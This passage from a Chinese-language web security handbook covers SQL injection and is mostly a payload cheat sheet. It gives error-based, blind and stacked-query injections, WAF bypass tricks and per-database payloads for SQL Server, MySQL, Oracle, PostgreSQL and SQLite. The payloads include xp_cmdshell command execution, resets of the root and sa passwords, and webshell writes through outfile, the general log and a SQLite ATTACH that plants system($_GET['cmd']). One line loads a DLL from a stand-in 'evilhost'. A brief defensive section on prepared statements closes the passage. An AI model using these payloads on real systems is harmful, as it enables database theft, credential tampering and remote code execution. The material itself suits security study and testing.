select 1/0
select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a
extractvalue(1, concat(0x5c,(select user())))
updatexml(0x3a,concat(1,(select user())),1)
exp(~(SELECT * from(select user())a))
ST_LatFromGeoHash((select * from(select * from(select user())a)b))
GTID_SUBSET(version(), 1)

4.1.2.5.1. 基于geometric的报错注入

GeometryCollection((select * from (select * from(select user())a)b))
polygon((select * from(select * from(select user())a)b))
multipoint((select * from(select * from(select user())a)b))
multilinestring((select * from(select * from(select user())a)b))
LINESTRING((select * from(select * from(select user())a)b))
multipolygon((select * from(select * from(select user())a)b))

其中需要注意的是，基于exp函数的报错注入在mysql 5.5.49后的版本已经不再生效，具体可以参考这个 commit 95825f 。

而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复，在5.5.x较后的版本中同样不再生效。

4.1.2.6. 堆叠注入

;select 1

4.1.2.7. 注释符

#
--+
/*xxx*/
/*!xxx*/
/*!50000xxx*/

4.1.2.8. 判断过滤规则

是否有trunc
是否过滤某个字符
是否过滤关键字
slash和编码

4.1.2.9. 获取信息

判断数据库类型
- and exists (select * from msysobjects ) > 0 access数据库
- and exists (select * from sysobjects ) > 0 SQLServer数据库
判断数据库表
- and exsits (select * from admin)
版本、主机名、用户名、库名
表和字段
- 确定字段数
  - Order By
  - Select Into
- 表名、列名

4.1.2.10. 测试权限

文件操作
- 读敏感文件
- 写shell
带外通道
- 网络请求

4.1.3. 权限提升

4.1.3.1. UDF提权

UDF（User Defined Function，用户自定义函数）是MySQL提供的一个功能，可以通过编写DLL扩展为MySQL添加新函数，扩充其功能。

当获得MySQL权限之后，即可通过这种方式上传自定义的扩展文件，从MySQL中执行系统命令。

4.1.4. 数据库检测

4.1.4.1. MySQL

sleep sleep(1)
benchmark BENCHMARK(5000000, MD5('test'))
字符串连接
- SELECT 'a' 'b'
- SELECT CONCAT('some','string')
version
- SELECT @@version
- SELECT version()
识别用函数
- connection_id()
- last_insert_id()
- row_count()

4.1.4.2. Oracle

字符串连接
- 'a'||'oracle' --
- SELECT CONCAT('some','string')
version
- SELECT banner FROM v$version
- SELECT banner FROM v$version WHERE rownum=1

4.1.4.3. SQLServer

WAITFOR WAITFOR DELAY '00:00:10';
SERVERNAME SELECT @@SERVERNAME
version SELECT @@version
字符串连接
- SELECT 'some'+'string'
常量
- @@pack_received
- @@rowcount

4.1.4.4. PostgreSQL

sleep pg_sleep(1)

4.1.5. 绕过技巧

编码绕过
- 大小写
- url编码
- html编码
- 十六进制编码
- unicode编码
注释
- // -- -- + -- - # /**/ ;%00
- 内联注释用的更多，它有一个特性 /!**/ 只有MySQL能识别
- e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
只过滤了一次时
- union => ununionion
相同功能替换
- 函数替换
  - substring / mid / sub
  - ascii / hex / bin
  - benchmark / sleep
- 变量替换
  - user() / @@user
- 符号和关键字
  - and / &
  - or / |
HTTP参数
- HTTP参数污染
  - id=1&id=2&id=3 根据容器不同会有不同的结果
- HTTP分割注入
缓冲区溢出
- 一些C语言的WAF处理的字符串长度有限，超出某个长度后的payload可能不会被处理
二次注入有长度限制时，通过多句执行的方法改掉数据库该字段的长度绕过

4.1.6. SQL注入小技巧

4.1.6.1. 宽字节注入

一般程序员用gbk编码做开发的时候，会用 set names 'gbk' 来设定，这句话等同于

set
character_set_connection = 'gbk',
character_set_result = 'gbk',
character_set_client = 'gbk';

漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后，mysql就会认为客户端传过来的数据是gbk编码的，从而使用gbk去解码，而mysql_real_escape是在解码前执行的。但是直接用 set names 'gbk' 的话real_escape是不知道设置的数据的编码的，就会加 %5c 。此时server拿到数据解码就认为提交的字符+%5c是gbk的一个字符，这样就产生漏洞了。

解决的办法有三种，第一种是把client的charset设置为binary，就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ，这里就会把编码的信息保存在和数据库的连接里面，就不会出现这个问题了。第三种就是用pdo。

还有一些其他的编码技巧，比如latin会弃掉无效的unicode，那么admin%32在代码里面不等于admin，在数据库比较会等于admin。

4.1.7. CheatSheet

4.1.7.1. SQL Server Payload

4.1.7.1.1. 常见Payload

Version
- SELECT @@version
Comment
- SELECT 1 -- comment
- SELECT /*comment*/1
Space
- 0x01 - 0x20
用户信息
- SELECT user_name()
- SELECT system_user
- SELECT user
- SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
用户权限
- select IS_SRVROLEMEMBER('sysadmin')
- select IS_SRVROLEMEMBER('db_owner')
List User
- SELECT name FROM master..syslogins
数据库信息
- SELECT name FROM master..sysdatabases
- select concat_ws(table_schema,table_name,column_name) from information_schema.columns
- select quotename(name) from master..sysdatabases FOR XML PATH('')
执行命令
- EXEC xp_cmdshell 'net user'
Ascii
- SELECT char(0x41)
- SELECT ascii('A')
- SELECT char(65)+char(66) => return AB
Delay
- WAITFOR DELAY '0:0:3' pause for 3 seconds
Change Password
- ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'
Trick
- id=1 union:select password from:user
文件读取
- OpenRowset
当前查询语句
- select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)
hostname
- 用于判断是否站库分离
- select host_name()
- exec xp_getnetname
服务器信息
- exec xp_msver

4.1.7.1.2. 注册表读写

xp_regread
- exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\\CurrentControlSet\\Services\\MSSEARCH'
xp_regwrite
xp_regdeletvalue
xp_regdeletkey
xp_regaddmultistring

4.1.7.1.3. 报错注入

1=convert(int,(db_name()))

4.1.7.1.4. 常用函数

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

4.1.7.1.5. DNS OOB

fn_xe_file_target_read_file
fn_get_audit_file
fn_trace_gettable

4.1.7.1.6. 其他常用存储过程

sp_execute_external_script
sp_makewebtask
sp_OACreate
sp_OADestroy
sp_OAGetErrorInfo
sp_OAGetProperty
sp_OAMethod
sp_OASetProperty
sp_OAStop
xp_cmdshell
xp_dirtree
xp_enumerrorlogs
xp_enumgroups
xp_fixeddrives
xp_getfiledetails
xp_loginconfig

4.1.7.2. MySQL Payload

4.1.7.2.1. 常见Payload

Version
- SELECT @@version
Comment
- SELECT 1 -- comment
- SELECT 1 # comment
- SELECT /*comment*/1
Space
- 0x9 0xa-0xd 0x20 0xa0
Current User
- SELECT user()
- SELECT system_user()
List User
- SELECT user FROM mysql.user
Current Database
- SELECT database()
List Database
- SELECT schema_name FROM information_schema.schemata
List Tables
- SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List Columns
- SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
If
- SELECT if(1=1,'foo','bar'); return 'foo'
Ascii
- SELECT char(0x41)
- SELECT ascii('A')
- SELECT 0x414243 => return ABC
Delay
- sleep(1)
- SELECT BENCHMARK(1000000,MD5('A'))
Read File
- select @@datadir
- select load_file('databasename/tablename.MYD')
Blind
- ascii(substring(str,pos,length)) & 32 = 1
Error Based
- select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
- select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))
Change Password
- mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"

4.1.7.2.1.1. 报错注入常见函数

extractvalue
updatexml
GeometryCollection
linestring
multilinestring
multipoint
multipolygon
polygon
exp

4.1.7.2.2. 写文件

4.1.7.2.2.1. 写文件前提

root 权限
知晓文件绝对路径
写入的路径存在写入权限
secure_file_priv 允许向对应位置写入
select count(file_priv) from mysql.user

4.1.7.2.2.2. 基于 into 写文件

union select 1,1,1 into outfile '/tmp/demo.txt'
union select 1,1,1 into dumpfile '/tmp/demo.txt'

dumpfile和outfile不同在于，outfile会在行末端写入新行，会转义换行符，如果写入二进制文件，很可能被这种特性破坏

4.1.7.2.2.3. 基于 log 写文件

show variables like '%general%';
set global general_log = on;
set global general_log_file = '/path/to/file';
select '<?php var_dump("test");?>';
set global general_log_file = '/original/path';
set global general_log = off;

4.1.7.3. PostgresSQL Payload

Version
- SELECT version()
Comment
- SELECT 1 -- comment
- SELECT /*comment*/1
Current User
- SELECT user
- SELECT current_user
- SELECT session_user
- SELECT getpgusername()
List User
- SELECT usename FROM pg_user
Current Database
- SELECT current_database()
List Database
- SELECT datname FROM pg_database
Ascii
- SELECT char(0x41)
- SELECT ascii('A')
Delay
- pg_sleep(1)

4.1.7.4. Oracle Payload

4.1.7.4.1. 常见Payload

dump
- select * from v$tablespace;
- select * from user_tables;
- select column_name from user_tab_columns where table_name = 'table_name';
- select column_name, data_type from user_tab_columns where table_name = 'table_name';
- SELECT * FROM ALL_TABLES
Comment
- --
- /**/
Space
- 0x00 0x09 0xa-0xd 0x20
报错
- utl_inaddr.get_host_name
- ctxsys.drithsx.sn
- ctxsys.CTX_REPORT.TOKEN_TYPE
- XMLType
- dbms_xdb_version.checkin
- dbms_xdb_version.makeversioned
- dbms_xdb_version.uncheckout
- dbms_utility.sqlid_to_sqlhash
- ordsys.ord_dicom.getmappingxpath
- utl_inaddr.get_host_name
- utl_inaddr.get_host_address
OOB
- utl_http.request
- utl_inaddr.get_host_address
- SYS.DBMS_LDAP.INIT
- HTTPURITYPE
- HTTP_URITYPE.GETCLOB
绕过
- rawtohex

4.1.7.4.2. 写文件

create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
   isto_file utl_file.file_type;
begin
   isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
   utl_file.put_line(isto_file, '<% out.println("test"); %>');
   utl_file.fflush(isto_file);
   utl_file.fclose(isto_file);
end;

4.1.7.5. SQLite3 Payload

Comment
- --
- /**/
Version
- select sqlite_version();

Command Execution

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--

Load_extension

UNION SELECT 1,load_extension('\\\\evilhost\\evil.dll','E');--

4.1.8. 预编译

4.1.8.1. 简介

SQL注入是因为解释器将传入的数据当成命令执行而导致的，预编译是用于解决这个问题的一种方法。和普通的执行流程不同，预编译将一次查询通过两次交互完成，第一次交互发送查询语句的模板，由后端的SQL引擎进行解析为AST或Opcode，第二次交互发送数据，代入AST或Opcode中执行。因为此时语法解析已经完成，所以不会再出现混淆数据和代码的过程。